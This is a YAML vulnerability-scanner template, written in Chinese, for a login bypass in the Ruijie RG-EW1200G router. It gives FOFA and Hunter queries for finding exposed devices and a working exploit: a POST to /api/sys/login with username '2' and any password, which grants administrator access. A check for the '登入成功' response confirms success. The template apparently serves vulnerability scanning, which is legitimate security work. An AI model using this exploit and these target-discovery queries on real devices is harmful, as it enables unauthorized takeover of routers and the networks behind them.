product: 锐捷RG-EW1200G
vName: 锐捷RG-EW1200G无线路由器 登录绕过
type: 访问控制
vID: [ ]
level: 3
vDesc: 锐捷网络RG-EW1200G是一款有线无线全千兆双频无线路由器，适合平层家居、别墅、小型店铺、SOHO办公等场景使用。设备性能卓越，足以满足千兆上网需求；信号强劲，信号功率功率提升3倍，覆盖距离提升近1倍覆盖能力强。锐捷网络RG-EW1200G /api/sys/login接口存在登录绕过逻辑漏洞，攻击者输入特定用户名无需密码即可获得设备管理员权限，可以登录路由器，获取敏感信息，控制内部网络。
version: HWR_1.0(1)B1P5,Release(07161417) r483
note: ''
search:
  FOFA: body="static/css/app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" && app="Ruijie-NBR路由器"
  Hunter: web.body="static/css/app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
protocol: http
link: https://mp.weixin.qq.com/s/9ljtwEVj_Hqog5EkaKFqJQ
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /api/sys/login
      json:
        password: '1231111111'
        timestamp: 1692412880000
        username: '2'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 登入成功
            logic: and